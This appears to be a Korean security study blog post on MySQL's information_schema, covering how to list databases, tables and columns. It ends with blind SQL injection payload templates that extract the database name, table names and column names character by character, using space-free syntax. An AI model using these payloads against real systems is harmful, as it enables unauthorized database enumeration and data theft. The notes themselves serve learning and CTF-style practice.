반응형
MySQL
information_schema : 기본적으로 만들어져 있는 DB
모든 DB에 대한 정보가 담겨져 있다.
DB
- select database() : 현재 사용중인 DB명 출력
- show databases : DB 조회
select 문만 이용해야 하는 경우 information_schema의 schemata 테이블을 조회하여 확인할 수 있다.
- information_schema.schemata : DB 조회
select schema_name from information_schema.schemata;schema_name : DB이름
Table
- show tables : table 조회
select 문만 이용해야 하는 경우 information_schema의 tables 테이블을 조회하여 확인할 수 있다.
- information_schema.tables : table 조회
select table_name, table_schema from information_schema.tables;table_schema : 해당 테이블이 속해 있는 데이터베이스 이름
table_name : 테이블 이름
- ex
select 1 from information_schema.tables where table_schema={DB_name} and table_name={table_name};: 테이블 존재 여부 확인 가능
select table_name from information_schema.tables where table_schema={DB_name};: 테이블 이름 확인
Column
- information_chema.columns : column 조회
- ex
select 1 from information_schema.columns where table_schema={DB_name} and table_name={table_name} and column_name={column_name};: 컬럼 존재 여부 확인 가능
select column_name from information_schema.columns where table_schema={DB_name} and table_name={table_name};: 테이블 이름 확인
MySQL :: MySQL 5.7 Reference Manual :: 24 INFORMATION_SCHEMA Tables
The world's most popular open source database Contact MySQL | Login | Register
dev.mysql.com
# 사용하고 있는 DB명 길이
if(length(database())in({db_len}),1,0)
# DB명
if(ord(substr(database(),{db_naem_index},1))in({ascii_code}),1,0)
# 테이블 길이
if(select(length(min(if((select(table_schema)from(database())),table_name,null))))from(information_schema.tables)in({tb_len}),1,0)
# 테이블 이름
if(ord((select(substr(min(if((select(table_schema)from(database())),table_name,null)),{tb_name_index},1))from(information_schema.tables))in({ascii_code}),1,0)
# 컬럼 길이
if((select(length(min(if((select(table_name)in({table_name})),column_name,null))))from(information_schema.columns))in({col_len}),1,0)
# 컬럼 이름
if(ord((select(substr(min(if((select(table_name)in({table_name})),column_name,null)),{col_name_index},1))from(information_schema.columns)))in({ascii_code}),1,0)반응형
'security > web' 카테고리의 다른 글
| Quine (0) | 2023.11.10 |
|---|---|
| htmlentities (0) | 2023.10.28 |
| 정규 표현식 (0) | 2023.09.27 |
| file url schema (0) | 2023.08.20 |
| 127.0.0.1 / localhost 우회 (0) | 2023.08.20 |